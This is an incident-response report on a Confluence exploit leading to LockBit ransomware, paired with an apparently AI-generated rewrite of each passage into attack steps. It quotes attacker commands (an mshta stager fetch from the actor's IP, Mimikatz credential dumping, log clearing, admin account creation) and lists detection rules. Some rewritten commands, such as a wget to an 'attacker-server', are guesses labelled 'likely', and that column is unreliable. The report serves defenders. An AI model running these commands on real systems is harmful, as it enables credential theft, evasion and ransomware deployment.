(see ‘Credential Access‘).Defense EvasionThrough their RDP session on the beachhead, the threat actor typed ‘virus’ in the start menu search to navigate tothe ‘Virus & threat protection’ settings to ensure Windows Defender was completely turned off. After exfiltrating data off the file server via Rclone, the Windows event logs were cleared via PowerShell: The wevtutil switches used:el | enum-logs List log namescl | clear-log Clear a logThe threat actor also deleted the files they brought into the environment: Credential AccessMimikatz was executed on the beachhead host just 20 minutes after initial access was performed. This was visiblein the memory on the host as Anydesk wrote the file to disk. Sysmon event code 1 showed the execution of Mimikatz: Sysmon event code 10 showed that Mimikatz accessed the LSASS process, and we can also see subsequentGrantedAccess for Mimikatz 0x1010 , which translates to: PROCESS_QUERY_LIMITED_INFORMATION(0x1000) and PROCESS_VM_READ (0x0010) . Sysmon event code 11 shows that the Mimikatz process creates a file called passwords.txt: Finally, the threat actor reviewed the captured passwords by opening the newly generated password file in Notepad,as documented in Sysmon event code 1: The threat actor also ran the script Veeam-Get-Creds-New.ps1 on the backup server: Powershell scripts are logged under event code 4104 if powershell script block logging is enabled: The script looks to be from the sadshade/veam-creds GitHub repository, and the script tries to get credentials fromthe Veeam credential manager.The threat actor also discovered a txt file on a file share server that contained IT-related cleartext passwords.Included were the credentials for a Domain Admin account. Through their RDP session, they proceeded withopening the the txt file using Notepad. Illustrated below via the process execution evidence: DiscoveryThe following commands were executed via the Confluence RCE:net userwhoamiquery user From the Meterpreter session, tasklist was used to enumerate the running processes. This threat actor identified C2processes that were established by a different actor and used ‘taskkill’ to end them. During this task, we noticed a threat actor blunder: the ‘taskkill’ execution on ‘powershell.exe’ killed their ownMeterpreter session. Consequently, they re-exploited Confluence to establish yet another Meterpreter session.Then, further discovery commands were executed on the host:query usernet userhostnameipconfig NetScan was then utilized to enumerate the local network: When NetScan is executed with the ‘Check for write access’ option enabled, a ‘delete.me’ file is created then deletedon discovered shares. We can observe this in Event ID 5145: After moving to a Domain Controller, ‘query user’ was once again executed. Then the Domain Admins group wasenumerated, after a typo: Lateral MovementThroughout the intrusion, RDP was used for lateral movement. The ‘Remote Desktop Connection’ app (mstsc.exe)was used on the Confluence beachhead to interactively logon to targeted hosts in the environment. The Event ID4624 logon activity: Lateral movement with RDP was done to different hosts in swift succession. Starting under one hour after theinitial compromise of the beachhead host. All RDP was performed from the beachhead. CollectionThe threat actor used Rclone to exfiltrate everything in a file share, see ‘Exfiltration‘ for more details. However,there were a few groups of files that were copied to C:\temp on the beachhead and then deleted about 30 secondslater. Command and ControlMetasploitCommand and control (C2) connections were established via Metasploit from the breached Confluence server tothe IP address 92.51.2[.]22 which is hosted in the provider called Flyservers S.A., reported in other blogs for beingused by LockBit affiliates. The connections were made to the port 4321. When downloading the Meterpreter HTA stager, the threat actor downloaded it by using a user-agent associatedwith Internet Explorer. AnyDeskA second C2 server 92.51.2[.]27 was employed to connect to AnyDesk. Through Fofa, it was possible to identify the hostname, WIN-EKIHV2OQQP8, associated with the server in theperiod related to the incident. This hostname was observed in the login activity on the beachhead host for this intrusion. The hostname can be traced through the certificate on the RDP service (port 3389), valid since the end of October2023. By searching for this hostname in fofa.info, it was possible to identify multiple IP addresses that were associatedwith malicious activities in VirusTotal in the past, some examples in the following image. The same hunt on Censys allowed us to identify six IP addresses which were potentially associated with theShadowSyndicate ransomware group based on a tweet made by @JRehbergCSK. Some of the identified IP addresses like 194.165.16[.]60 and 45.227.252[.]227 were also mentioned in a Group-IBReport about ShadowSyndicate.The AnyDesk connection was utilized to drop tools to enumerate the infrastructure, access credentials and exfiltrateand encrypt data. ExfiltrationJust one hour and eleven minutes after initial access the threat actor started exfiltration activity. This was donefrom a file share server, performed with Rclone and exfiltrated to mega (Mega.nz). We have previously reported onthe usage of rclone several times. We were able to retrieve the Rclone configuration file used: As shown above the configuration file is encrypted and password protected. Fortunately the threat actor had badopsec and reused a password so we were able to decrypt the file using the “rclone config show” command: From Zeek network logs we see data being exfiltrated: The next deployment process began with PDQ Deploy being executed from the beachhead system. Organizationscan utilize the PDQ Deploy to remotely and efficiently create multi-step deployments for end users, supportingvarious formats such as .exe, .msi, .bat, .ps1, and .vbs. PDQ Deploy allows administrators to execute scripts andcommands (e.g., PowerShell, VBScript, and batch files) on remote computers and groups integrated withSpiceworks, Active Directory, or PDQ Inventory. The tool also provides deployment reports to monitor and tracksuccessful deployments.PDQ Deploy operates through two Windows services:PDQDeployService.exe is the background service that manages all schedules and deployments on the console.PDQDeployRunner-n (e.g., PDQDeployRunner-1) is the target service executed on remote hosts to perform thedeployments.During deployment, the target service and installation files for the deployment package are copied to a directory onthe target computer’s default share, enabling the execution of deployment tasks. To facilitate the ransomware deployment with PDQ the threat actor created a file called asd.bat to launch theLockBit executable. asd.bat content: We were able collect the PDQ .db files from C:\ProgramData\Admin Arsenal\PDQ Deploy\ on the beachhead to seethe deployment data created by the threat actor. Suricata was also alerting on the activity: From the network traffic we see HTTP posts done with rclone: ImpactAfter around two hours into the intrusion, the threat actor transferred PDQ Deploy and the LockBit Blackexecutable, under the C:\Temp folder on the beachhead host. The same files were then also created on the domaincontroller. PDQ Deploy is a software tool designed for automating patch management and deploying applications.In this case, it was leveraged to facilitate the deployment of the LockBit ransomware. Before the threat actor used PDQ they first ran the LockBit binary manually over RDP sessions on the back serverand file server. Threat actor logged in via their ‘backup’ user: Domain Admin User/Credentials used to deploy: Files included in PDQ library: Several runs of the deployment package by the threat actor: Several ways to attempt to execute the ransomware including calling the file, command arguments, and finally thebatch file: Once the threat actor started the deployment we observed both PDQ service runners and the package files(ransomware and batch file) being deployed over SMB. This batch file was then executed on hosts across the environment via the PDQ runner. After completing the deployment using PDQ, the threat actor connected to an Exchange server using RDP. They issued a few commands to stop running processes associated with Exchange and SQL on the server:process net stop MSExchangeUMprocess taskkill /f /im sql*They then dropped a batch file, test.bat, which contained a list of the systems found earlier during the intrusion, aswell as a ransomware execution command. This appears to have been a backup to try and hit systems that may havebeen missed during the PDQ deployment. Below is an extract of the test.bat contents: Computedasd.bat438448FDC7521ED034F6DABDF814B6BAF08E7343A94897ADEAE78138CC3F9142ED160A031E2E25A996F72089F12755F931E7FCA9B64DD85B03A56A9871FD6BB8F2CF1DBBnetscan.exeD7ADDB5B6F55EAB1686410A17B3C867BA54AF16B2702FE0E5C569F6D8F17574A9FDAF197498BA0AFA5D3B390F852AF66BD6E763945BF9B6BFF2087015ED8612A18372155test.bat9D495530A421A7C7E113B7AFC3A5050402D291E2FF5799A13EACC72AD0758F2C5E69D414594F2F8AB05F88F765D05EB1CF24E4C697746905A61ED04A6FC2B744DD6FEBB0Veeam-Get-Creds-New.ps13BD63B2962D41D2E29E570238D28EC0E9537E1C4E5DDD7FB9B98C532CA89A9DB08262AB47AA8E510B9C3B5D39F84E4C2FA68C81DA888E091436FDB7FEE276EE7FF87F016BehavioralLSASS Memory - T1003.001System Network Configuration Discovery - T1016Remote System Discovery - T1018Remote Desktop Protocol - T1021.001System Owner/User Discovery - T1033Network Service Discovery - T1046Process Discovery - T1057PowerShell - T1059.001Windows Command Shell - T1059.003Clear Windows Event Logs - T1070.001Software Deployment Tools - T1072Ingress Tool Transfer - T1105Exploit Public-Facing Application - T1190System Binary Proxy Execution: Mshta - T1218.005Remote Access Software - T1219Data Encrypter for Impact - T1486Credentials In Files - T1552.001Exfiltration to Cloud Storage - T1567.002 After the ransomware attack was completed, the affected files were renamed with the .rhddiicoE extension, and aransom note titled rhddiicoE.README.txt was left on the compromised hosts. Additionally, the desktop background image was modified as part of the ransomware execution. Timeline Diamond Model IndicatorsAtomic92[.]51.2.2292[.]51.2.27 Create or Modify System Process: Windows Service - T1543.003Valid Accounts: Local Accounts - T1078.003DetectionsNetworkET ATTACK_RESPONSE PowerShell Base64 Encoded Content Command Common In Powershell Stagers M1ET ATTACK_RESPONSE PowerShell NoProfile Command Received In Powershell StagersET EXPLOIT Atlassian Confluence RCE Attempt Observed (CVE-2023-22527) M1ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dlET HUNTING PE EXE Download over raw TCPET HUNTING PowerShell Hidden Window Command Common In Powershell Stagers M1ET INFO Dotted Quad Host HTA RequestET INFO User-Agent (python-requests) Inbound to WebserverET MALWARE Possible Metasploit Payload Common Construct Bind_API (from server)ET POLICY Possible HTA Application DownloadET WEB_CLIENT HTA File containing Wscript.Shell Call - Potential CVE-2017-0199ET WEB_CLIENT PowerShell call in script 1ET WEB_CLIENT PowerShell call in script 2ET WEB_SERVER Possible SQL Injection (exec) in HTTP Request BodyET WEB_SERVER WebShell Generic - net userET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2023-22515 Vulnerable Server Detected M1ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2023-22515 Vulnerable Server Detected M2ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2023-22518 Vulnerable Server Detected Version 8.x M1ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2023-22518 Vulnerable Server Detected Version 8.x M2ETPRO ATTACK_RESPONSE Possibly Malicious VBScript Executing WScript.Shell Run M1ETPRO HUNTING Observed Suspicious Base64 Encoded Wide String Inbound (zip)ETPRO HUNTING Suspicious Offset PE EXE or DLL Download on Non-Standard PortsETPRO MALWARE Possible Malicious VBScript calling PowerShell over HTTPETPRO MALWARE Possible Malicious VBScript calling PowerShell over HTTP 1 M2SigmaSearch rules on detection.fyi or sigmasearchengine.comDFIR Public Rules Repo:8a0d153f-b4e4-4ea7-9335-892dfbe17221 : NetScan Share Enumeration Write Access CheckDFIR Private Rules:1aafd4cc-cb38-498b-9365-394f71fd872c : Veeam Credential Dumping Script (PSH)8a64fe8d-e9d5-4c8c-9716-0ceed9b3b791 : Notepad Password Files Discovery b878e8c2-bfa5-4b1d-8868-a798f57d197a : Veeam Credential Dumping Script Execution53c4b596-8af3-42f3-a974-bddfbf6db731 : Wevtutil.exe Log Clearing Process Execution516c6fbc-949a-4aa7-8727-c041aee56dc0 : Execution of Remote HTA File via mshta.exe8a64fe8d-e9d5-4c8c-9716-0ceed9b3b791 : Notepad Password Files Discovery3a9897de-164a-4b5a-8995-ffdc301d6f6d : Confluence Executing Suspicious Commands7019b8b4-d23e-4d35-b5fa-192ffb8cb3ee : Use of Rclone to exfiltrate data over an SSH channel62047536-b23d-4aef-af94-b6095aea1617 : Data Exfiltration Using Rclone with Cloud StorageSigma Repo:cd951fdc-4b2f-47f5-ba99-a33bf61e3770 : Always Install Elevated Windows Installere32d4572-9826-4738-b651-95fa63747e8a : Base64 Encoded PowerShell Command Detected7d9263bd-dc47-4a58-bc92-5474abab390c : Change Winevt Channel Access Permission Via Registry2f78da12-f7c7-430b-8b19-a28f269b77a3 : Disable Windows Event Logging Via Registryfcddca7c-b9c0-4ddf-98da-e1e2d18b0157 : Disabled Windows Defender Eventlog61065c72-5d7d-44ef-bf41-6a36684b545f : Elevated System Shell Spawned98767d61-b2e8-4d71-b661-e36783ee24c1 : Gzip Archive Decode Via PowerShella642964e-bead-4bed-8910-1bb4d63e3b4d : HackTool - Mimikatz Execution502b42de-4306-40b4-9596-6f590c81f073 : Local Accounts Discoveryf26c6093-6f14-4b12-800f-0fcb46f5ffd0 : Malicious Base64 Encoded PowerShell Keywords in Command Lines183e7ea8-ac4b-4c23-9aec-b3dac4e401ac : Net.EXE Executioncd219ff3-fa99-45d4-8380-a7d15116c6dc : New User Created Via Net.EXEf4bbd493-b796-416e-bbf2-121235348529 : Non Interactive PowerShell Process Spawnedd679950c-abb7-43a6-80fb-2a480c4fc450 : PDQ Deploy Remote Adminstartion Tool Executiond7bcd677-645d-4691-a8d4-7a5602b780d1 : Potential PowerShell Command Line Obfuscation8e0bb260-d4b2-4fff-bb8d-3f82118e6892 : Potentially Suspicious CMD Shell Output Redirectfdb62a13-9a81-4e5c-a38f-ea93a16f6d7c : PowerShell Base64 Encoded FromBase64String Cmdlet3b6ab547-8ec2-4991-b9d2-2b06702a48d7 : PowerShell Download Pattern6e897651-f157-4d8f-aaeb-df8151488385 : PowerShell Web Download86085955-ea48-42a2-9dd3-85d4c36b167d : Process Terminated Via Taskkillb52e84a3-029e-4529-b09b-71d19dd27e94 : Remote Access Tool - AnyDesk Executionb98d0db6-511d-45de-ad02-e82a98729620 : Remotely Hosted HTA File Executed Via Mshta.EXE2aa0a6b4-a865-495b-ab51-c28249537b75 : Startup Folder File Write88872991-7445-4a22-90b2-a3adadb0e827 : Stop Windows Service Via Net.EXE590a5f4c-6c8c-4f10-8307-89afe9453a9d : Suspicious Child Process Created as System7be5fb68-f9ef-476d-8b51-0256ebece19e : Suspicious Execution of Hostnamefb843269-508c-4b76-8b8d-88679db22ce7 : Suspicious Execution of Powershell with Base645cb299fc-5fb1-4d07-b989-0644c68b6043 : Suspicious File Download From IP Via Curl.EXEd75d6b6b-adb9-48f7-824b-ac2e786efe1f : Suspicious FromBase64String Usage On Gzip Archive - Process Creation03cc0c25-389f-4bf8-b48d-11878079f1ca : Suspicious MSHTA Child Process 754ed792-634f-40ae-b3bc-e0448d33f695 : Suspicious PowerShell Parent Process2617e7ed-adb7-40ba-b0f3-8f9945fe6c09 : Suspicious SYSTEM User Process Creation63332011-f057-496c-ad8d-d2b6afb27f96 : Suspicious Tasklist Discovery Commandce72ef99-22f1-43d4-8695-419dcb5d9330 : Suspicious Windows Service Tamperingd0d28567-4b9a-45e2-8bbc-fb1b66a1f7f6 : Unusually Long PowerShell CommandLinee28a5a99-da44-436d-b7a0-2afc20a5f413 : Whoami Utility Execution8de1cbe8-d6f5-496d-8237-5f44a721c7a0 : Whoami.EXE Execution Anomaly79ce34ca-af29-4d0e-b832-fc1b377020db : Whoami.EXE Execution From Privileged Process671bb7e3-a020-4824-a00e-2ee5b55f385e : WMI Module Loaded By Uncommon ProcessYaraBINARYALERT_Hacktool_Windows_Mimikatz_CopywriteBINARYALERT_Hacktool_Windows_Mimikatz_FilesELASTIC_Windows_Trojan_Metasploit_38B8CeecELASTIC_Windows_Trojan_Metasploit_47F5D54AELASTIC_Windows_Trojan_Metasploit_4A1C4Da8ELASTIC_Windows_Trojan_Metasploit_7Bc0F998ELASTIC_Windows_Trojan_Metasploit_C9773203GODMODERULES_IDDQD_God_Mode_RuleSECUINFRA_SUSP_Powershell_Base64_DecodeSIGNATURE_BASE_MAL_RANSOM_Lockbit_Apr23_1SIGNATURE_BASE_MAL_RANSOM_Lockbit_Forensicartifacts_Apr23_1SIGNATURE_BASE_Msfpayloads_Msf_RefSIGNATURE_BASE_Powershell_Susp_Parameter_ComboMAL_RANSOM_LockBit_Apr23_1MAL_RANSOM_LockBit_ForensicArtifacts_Apr23_1SIGNATURE_BASE_MAL_RANSOM_Lockbit_Apr23_1SIGNATURE_BASE_MAL_RANSOM_Lockbit_Forensicartifacts_Apr23_1ELASTIC_Windows_Ransomware_Lockbit_369E1E94CRAIU_Crime_Lockbit3_RansomwareMITRE ATT&CK

Original Text	ChatGPT 4o Paged
Confluence Exploit Leads to LockBit RansomwareKey TakeawaysThe intrusion began with the exploitation of CVE-2023-22527 on an exposed Windows Confluence server,ultimately leading to the deployment of LockBit ransomware across the environment.The threat actor leveraged various tools, including Mimikatz, Metasploit, and AnyDesk.The threat actor leveraged RDP for lateral movement, deploying LockBit ransomware through multiple methods,including copying files over SMB shares for remote execution and automated distribution via PDQ Deploy.Sensitive data was exfiltrated using Rclone, transferring files to MEGA.io cloud storage.The intrusion had a rapid Time to Ransom (TTR) of around just two hours.The DFIR Report ServicesExplore this case in-depth with our hands-on DFIR Labs!Private Threat Briefs: 20+ private DFIR reports annually.Threat Feed: Focuses on tracking Command and Control frameworks like Cobalt Strike, Metasploit, Sliver, etc.All Intel: Includes everything from Private Threat Briefs and Threat Feed, plus private events, Threat Actor Insightsreports, long-term tracking, data clustering, and other curated intel.Private Sigma Ruleset: Features 170+ Sigma rules derived from 50+ cases, mapped to ATT&CK with test examples.DFIR Labs: Offers cloud-based, hands-on learning experiences, using real data, from real intrusions. Interactivelabs are available with different difficulty levels and can be accessed on-demand, accommodating various learningspeeds.Table of Contents:Case SummaryAnalystsInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential Access	Phase: Initial Access Technique: Exploitation of Vulnerability Procedure: The attacker exploits CVE-2023-22527 on an exposed Windows Confluence server to gain initial access. Phase: Execution Technique: Metasploit Usage Command: Likely use of Metasploit Framework for post-exploitation tasks on compromised systems. Phase: Persistence Technique: Remote Desktop Protocol (RDP) Procedure: Use of AnyDesk and RDP to maintain persistent access and for remote control of the system. Phase: Privilege Escalation Technique: Credential Dumping with Mimikatz Command: `mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit` Phase: Lateral Movement Technique: Remote Service and File Sharing Procedure: Use of RDP for accessing other systems and deploying ransomware. Procedure: Copying files over SMB shares for remote execution. Procedure: Automated distribution of ransomware using PDQ Deploy. Phase: Credential Access Technique: Use of Mimikatz Command: `mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit` Phase: Exfiltration Technique: Data Transfer to Cloud Storage Procedure: Using Rclone to transfer sensitive data to MEGA.io cloud storage. Phase: Impact Technique: Ransomware Deployment Procedure: Deployment of LockBit ransomware across the environment using various methods such as SMB and PDQ Deploy.
DiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpactTimelineDiamond ModelIndicatorsDetectionsMITRE ATT&CKCase SummaryThe intrusion started with the exploitation of CVE-2023-22527, a critical remote code execution vulnerability inConfluence, against a Windows server. The first indication of threat actor activity was the execution of systemdiscovery commands, including net user and whoami.Shortly after, the threat actor attempted to download AnyDesk via curl, but the attempt initially failed. They thenpivoted to using mshta to retrieve a remote HTA file containing a Metasploit stager. After establishing commandand control with the Metasploit server, they leveraged it to successfully download and install AnyDesk. Onceinstalled, AnyDesk was configured with a preset password, providing the threat actor with persistent remote access.Within ten minutes, the threat actor began process enumeration using tasklist, identifying several processes ofinterest, which they then terminated. We assess that these processes belonged to a prior threat actor, and by killingthem, the attacker ensured exclusive control over the server. Notably, they terminated PowerShell, inadvertentlykilling their own Metasploit process. This forced them to rerun the exploit to drop a new Metasploit stager andreestablish command and control. After regaining access, they created a new local account and added it to theAdministrators group.They accessed the beachhead host via rdp, using a newly created local account and then executed Mimikatz. Next,they leveraged SoftPerfect’s NetScan to enumerate remote hosts across the network. Using this information, theytargeted a backup server, moving laterally via RDP using the default Administrator account.On the backup server, the threat actor executed a PowerShell script, Veeam-Get-Creds-New.ps1, to extract Veeamcredentials. They then pivoted to a file share server via RDP. Once on the file server, they deployed Rclone toexfiltrate data to MEGA.io. Following the exfiltration, they cleared all Windows event logs on the file server.The threat actors then pivoted to a domain controller via RDP using domain administrator credentials. Once on thedomain controller, they enumerated domain administrator group memberships. Meanwhile, they returned to the	Phase: Initial Access Technique: Exploit Public-Facing Application Procedure: Exploitation of CVE-2023-22527 in Confluence on a Windows server. Phase: Discovery Technique: System Information Discovery Command: `net user` Command: `whoami` Phase: Execution Technique: mshta Procedure: Use of `mshta` to retrieve a remote HTA file containing a Metasploit stager. Phase: Command and Control Technique: Remote Access Tools Tool: AnyDesk (Downloaded via Metasploit after initial attempt with `curl` failed) Technique: Metasploit Procedure: Established C2 with the Metasploit server and used it to install AnyDesk. Phase: Persistence Technique: Remote Access Tool Configuration Procedure: Configured AnyDesk with a preset password for persistent access. Phase: Discovery Technique: Process Discovery Command: `tasklist` Phase: Privilege Escalation Technique: Create Account Procedure: Created a new local account and added it to the Administrators group. Phase: Lateral Movement Technique: Remote Desktop Protocol (RDP) Procedure: Accessed using the newly created local account. Phase: Credential Access Technique: OS Credential Dumping Command: Execution of Mimikatz. Phase: Discovery Technique: Network Service Scanning Tool: SoftPerfect NetScan Phase: Lateral Movement Technique: Remote Desktop Protocol (RDP) Procedure: Used default Administrator account to move to the backup server. Phase: Credential Access Technique: Credential Dumping via Script Command: Executed `Veeam-Get-Creds-New.ps1` PowerShell script on backup server. Phase: Exfiltration Technique: Exfiltration Over Alternative Protocol Tool: Rclone Procedure: Data exfiltrated to MEGA.io. Phase: Defense Evasion Technique: Clear Windows Event Logs Command: Cleared all event logs on the file server. Phase: Lateral Movement Technique: Remote Desktop Protocol (RDP) Procedure: Pivoted to domain controller using domain admin credentials. Phase: Discovery Technique: Permission Groups Discovery Procedure: Enumerated domain administrator group memberships.
backup server to review its configuration.Shortly after, the threat actor launched LockBit ransomware across the environment. They began by manuallyexecuting the ransomware on a backup server and a file share server over their active RDP sessions. To ensurewidespread encryption, they then shifted to the beachhead host, where they leveraged PDQ Deploy, a legitimateenterprise deployment tool, to automate ransomware distribution across the rest of the network.Using PDQ Deploy, the threat actors distributed the ransomware binary and a batch script to remote hosts overSMB. They then remotely executed the script via PDQ, triggering ransomware deployment across multiple systems.Next, they pivoted to an Exchange server.On the Exchange server, the threat actor stopped key services using net stop and taskkill. They then deployed aransomware binary alongside a new batch script, which, when executed, initiated ransomware encryption. Thisscript was designed to mount remote systems’ C$ shares, effectively enabling a secondary encryption wave—afailsafe mechanism in case PDQ Deploy had missed any targets.The Time to Ransomware (TTR) was just over 2 hours (02:06:14), making it an extremely rapid intrusion.If you would like to get an email when we publish a new report, please subscribe here.AnalystsAnalysis and reporting completed by Angelo Violetti, @malforsec, teddy_ROxPinInitial AccessIn early February 2024, we identified a security breach originating from an exposed Windows server. The serverwas compromised through a Confluence remote code execution (RCE) vulnerability that was disclosed on January16, 2024.	Phase: Initial Access Technique: Exploitation of Remote Code Execution (RCE) Procedure: Attacker exploited a Confluence RCE vulnerability on an exposed Windows server. Phase: Execution Technique: Ransomware Execution via RDP Procedure: Manually executed LockBit ransomware on the backup server and file share server through active RDP sessions. Phase: Execution and Lateral Movement Technique: Use of Legitimate Tools (PDQ Deploy) Procedure: Used PDQ Deploy to automate distribution of the ransomware binary and batch script across the network over SMB. Remotely executed the batch script via PDQ to trigger ransomware deployment. Phase: Execution on Exchange Server Technique: Service Stop and Batch Script Execution Commands: Service Stopping: Used `net stop` and `taskkill` to stop key services on the Exchange server. Batch Script Execution: Mounted remote systems' C$ shares and executed a ransomware binary with a batch script to initiate and ensure encryption. This structured approach facilitates understanding and emulation of the attack techniques used by the threat actor.
The vulnerability arises from improper handling of user-supplied input within certain template files in Confluence.Specifically, files like confluence/template/xhtml/pagelist.vm accept parameters that are passed to potentiallydangerous functions without sufficient sanitization. For instance, the $stack.findValue function can be manipulatedto inject malicious Object-Graph Navigation Language (OGNL) expressions, leading to arbitrary code execution.Threat actors can exploit this vulnerability by sending crafted HTTP POST requests to specific endpoints, such as /template/aui/text-inline.vm, with malicious payloads in the parameters. Additional details about the vulnerabilitycan be found in those reports: Trend Micro and Splunk.ExecutionAfter running initial discovery commands the threat actor attempted to download an AnyDesk installer from theirserver using the exploit.	Phase: Initial Access Technique: Exploiting Web Application Vulnerability Procedure: The attacker sends crafted HTTP POST requests to the `/template/aui/text-inline.vm` endpoint with malicious OGNL expressions to exploit the vulnerability in Confluence. Phase: Execution Technique: Arbitrary Code Execution via OGNL Injection Procedure: Manipulating the `$stack.findValue` function to inject OGNL expressions, allowing execution of arbitrary code. Phase: Post-Exploitation Technique: File Download via Exploitation Command (Inference): Likely used a command to download a file, such as: `shell wget http://attacker-server/anydesk-installer.exe` Phase: Execution Technique: Remote Access Tool Installation Procedure: Using the downloaded AnyDesk installer to gain persistent remote access to the compromised system. These procedures outline the attack chain leveraging the Confluence vulnerability to execute arbitrary code and potentially deploy a remote access tool.
Confluence RCE ExploitationThe threat actor initially gained access by exploiting a server-side template injection vulnerability(CVE-2023-22527, CVSS 10.0) in an exposed Atlassian Confluence server. This vulnerability allows anunauthenticated threat actor to execute arbitrary commands on the target server by injecting OGNL expressions.The exploitation started from the IP address 92[.]51.2.22 as shown by the following Suricata alert. The first commands executed by the threat actor were net user and whoami. These were used to enumerate the useraccounts on the compromised Windows server and to gather information about the currently affected user.Moreover, the exploitation was likely made through a Python script based on the user-agent used.	Phase: Initial Access Technique: Exploitation of Vulnerability (Server-Side Template Injection) Procedure: The attacker exploited CVE-2023-22527 on an Atlassian Confluence server to execute arbitrary commands using OGNL expressions. Phase: Execution Technique: Command Execution via Exploited Vulnerability Command 1: `net user` Purpose: Enumerate user accounts on the compromised server. Command 2: `whoami` Purpose: Identify the currently affected user. Tools and Methodology Technique: Automated Exploitation with Script Procedure: Likely execution using a Python script, as inferred from the user-agent.
This encoded command spawns another PowerShell process with an obfuscated command line. To deobfuscate the command line, it’s necessary to:Remove the + symbol, which concatenates strings.Replace {0}, {1} and {2} respectively with =, 6 and P.Base64 decode the resulting string.Gzip decompress the base64 decoded string.The result is the following PS script, which performs the following actions:Gets the pointers to specific Windows API functions: VirtualAlloc(), VirtualProtect(), CreateThread() andWaitForSingleObject().Allocates a new region of memory via VirtualAlloc() with PAGE_EXECUTE_READWRITE (0x40) permissions.Copies a base64 decoded Metasploit shellcode into the newly allocated region of memory.Changes the protection of the new memory region into PAGE_EXECUTE (0x10).Creates a new thread pointing to the start of the new memory region to execute the Metasploit shellcode.Waits for the end of the shellcode execution. The Metasploit shellcode can be emulated through speakeasy to identify the command and control server.	Phase: Execution Technique: PowerShell Script Execution Procedure: The threat actor uses an encoded PowerShell command. Steps to deobfuscate include: Remove the `+` symbol used for string concatenation. Replace placeholders `{0}`, `{1}`, `{2}` with `=`, `6`, and `P` respectively. Base64 decode the resulting string. Gzip decompress the decoded string. Resulting Actions: APIs Used: Obtains pointers to Windows API functions like `VirtualAlloc()`, `VirtualProtect()`, `CreateThread()`, and `WaitForSingleObject()`. Memory Allocation: Allocates memory with `PAGE_EXECUTE_READWRITE` permissions using `VirtualAlloc()`. Shellcode Injection: Copies base64-decoded Metasploit shellcode into the allocated memory. Memory Protection Change: Modifies memory region permissions to `PAGE_EXECUTE` with `VirtualProtect()`. Shellcode Execution: Creates a new thread to execute the Metasploit shellcode. Execution Monitoring: Uses `WaitForSingleObject()` to monitor the execution completion. Emulation Tool: The Metasploit shellcode can be analyzed using tools like Speakeasy to identify the command and control server.
The execution of curl failed to download the AnyDesk installer though. This did not stop the threat actor who latersuccessfully downloaded an AnyDesk installer by other means.MeterpreterApproximately ten minutes after gaining initial access, the threat actor leveraged the native Windows mshta.exeutility to download and execute a Metasploit stager.mshta http://92.51.2[.]22:443/UsySLX1n.htaAs outlined in the lolbas project, this technique enables the threat actor to drop a payload into the INetCachedirectory and execute it directly from there, leveraging trusted system utilities to evade detection. The HTA file executes an encoded PowerShell command. The contents of the HTA file:	Phase: Execution Technique: Microsoft HTA Execution Command: `mshta http://<URL>/UsySLX1n.hta` Description: Used to download and execute a Metasploit stager using mshta.exe. Technique: PowerShell Execution Command: Encoded PowerShell command executed by the HTA file. Description: HTA file contains a PowerShell command that is executed to deploy the payload. Phase: Defense Evasion Technique: Living off the Land Binaries (LOLBin) - mshta.exe Description: Utilizes trusted system utility mshta.exe to execute scripts and evade detection mechanisms.
PersistenceAs part of the AnyDesk installation on the beachhead, a service was installed to ensure the instance becameavailable again after a restart. The following PowerShell command was executed to download AnyDesk:powershell -c (New-Object Net.WebClient).DownloadFile('http://download.anydesk.com/AnyDesk.msi', 'AnyDesk.msi')The Windows System event 7045 shows service creations. The details show that AnyDeskMSI.exe will be started,and the start type is set to auto, so it will run after a restart of the server. The threat actor used both valid accounts and created a new account on the beachhead host. The user “backup” wascreated, given a password, and added to the local “Administrator” group. Sysmon event code 1 shows thecommands ran to perform the activity: Windows Security events 4720 “A user account was created” and 4732 “A member was added to security enabledlocal group” show the creation of the user and then adding the user to the Administrators group. As the usernamedoes not show in the 4732 event. Make sure to compare the unique Security Identifier(SID):	Phase: Persistence Technique: Service Installation for Persistence Procedure: A service was installed to ensure AnyDesk would run automatically after a system restart. Command: `powershell -c (New-Object Net.WebClient).DownloadFile('http://download.anydesk.com/AnyDesk.msi', 'AnyDesk.msi')` Phase: Privilege Escalation Technique: Account Manipulation Procedure: Creation of a new user account with administrator privileges. Command 1: Creating a new user Likely Command: `net user backup <Password> /add` Command 2: Adding the new user to the local "Administrators" group Likely Command: `net localgroup Administrators backup /add`
Privilege EscalationConfluence RCE provided SYSTEM access to the beachhead. This was utilized to create a local administrator usernamed ‘backup’. With the ‘backup’ user, the threat actor was able to RDP to the beachhead with a proxy connectionvia their Metasploit payload and execute mimikatz. The mimikatz execution resulted in the disclosure of an easilycrackable hash for the ‘Administrator’ account on the beachhead. Unfortunately, this password was re-used acrossthe hosts in the environment. Utilizing the ‘Administrator’ account on a File Server, the threat actor was able tolocate cleartext credentials for other privileged accounts account (see ‘Credential Access‘).Defense EvasionThrough their RDP session on the beachhead, the threat actor typed ‘virus’ in the start menu search to navigate tothe ‘Virus & threat protection’ settings to ensure Windows Defender was completely turned off. After exfiltrating data off the file server via Rclone, the Windows event logs were cleared via PowerShell: The wevtutil switches used:el \| enum-logs List log namescl \| clear-log Clear a logThe threat actor also deleted the files they brought into the environment:	Phase: Privilege Escalation Technique: Exploit Public-Facing Application (Confluence RCE) Procedure: Obtained SYSTEM access and created a local administrator user named 'backup'. Phase: Execution Technique: RDP Session Establishment Procedure: Used RDP with a proxy connection via Metasploit payload to access the beachhead. Technique: Credential Dumping Command: `mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit` Procedure: Extracted easily crackable hash for the 'Administrator' account. Phase: Credential Access Technique: Exploit Reused Credentials Procedure: Accessed a File Server using the compromised 'Administrator' account to obtain cleartext credentials. Phase: Defense Evasion Technique: Disable or Modify Tools Procedure: Searched 'virus' in the start menu to access 'Virus & threat protection' settings and disable Windows Defender. Technique: Clear Windows Event Logs Command: `wevtutil el` (List log names) `wevtutil cl [LogName]` (Clear a log) Technique: Delete Artifacts Procedure: Removed files brought into the environment to evade detection. Phase: Exfiltration 